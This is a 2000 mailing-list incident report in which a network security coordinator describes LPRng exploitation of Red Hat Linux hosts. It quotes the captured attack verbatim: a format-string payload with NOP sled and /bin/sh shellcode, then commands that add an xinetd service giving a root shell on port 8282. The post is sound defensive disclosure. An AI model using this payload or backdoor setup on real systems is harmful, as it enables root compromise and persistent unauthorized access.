Security Incidents mailing list archives
LPRng exploits
From: Kathy Bergsma <kathya () nersp nerdc ufl edu>
Date: Wed, 29 Nov 2000 15:29:12 -0500
Port 515 on our network was scanned from uiowa.edu over the weekend. Here's some information on the LPRng exploits attempted against several RedHat Linus 7.x hosts. The intruder attempts to create a file called /dev/whoa/reg. It looks like they intend for reg to open port 8282 with root privileges. They then edit xinetd.conf file and restart xinetd to open the port. Evidence of these changes was cleared from compromised hosts once the intruder installed his kit. A password protected guest account with a GID of 0 was created on one compromised host. The following files were also changed: du, find, ls, netstat, passwd, ping, psr, and su. Shown below is session data from the exploit. Shown first is the format string used execute a root shell. Shown after that are the commands executed from the shell. -- Kathy Bergsma Network Security Coordinator BB{E0}{F3}{FF}{BF}{E1}{F3}{FF}{BF}{E2}{F3}{FF}{BF}{E3}{F3}{FF}{BF}XXXXXXXXXXXXXXXXXX%.160u%300$n%.17u%301$nse curity%302$n%.192u%303$n{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2} {B2}f{89}{D0}1{C9}{89}{CB}C{89}]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}E{EE}{F}'{89}M{F0} {8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}?{89}{D0}{CD} {80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF} /bin/sh{A} mkdir /dev/whoa ; echo "service reg" > > /dev/whoa/reg ; echo "{" >
/dev/whoa/reg; echo "socket_type = stream" > /dev/whoa/reg;{D}{A}
echo "port = 8282" > > /dev/whoa/reg; echo "protocol = tcp" > > /dev/whoa/reg; echo "wait = no" > > /dev/whoa/reg;{D}{A} echo "user = root" > > /dev/whoa/reg ; echo "server = /bin/sh" > > /dev/whoa/reg ; echo "server_args = -i" > > /dev/whoa/reg;{D} {A} echo "}" > > /dev/whoa/reg ; echo "includedir /dev/whoa" > > /etc/xinetd.conf ; nohup /etc/rc.d/init.d/xinetd restart > > /dev /null 2 > > /dev/null;{D}{A}
Current thread:
- LPRng exploits Kathy Bergsma (Dec 01)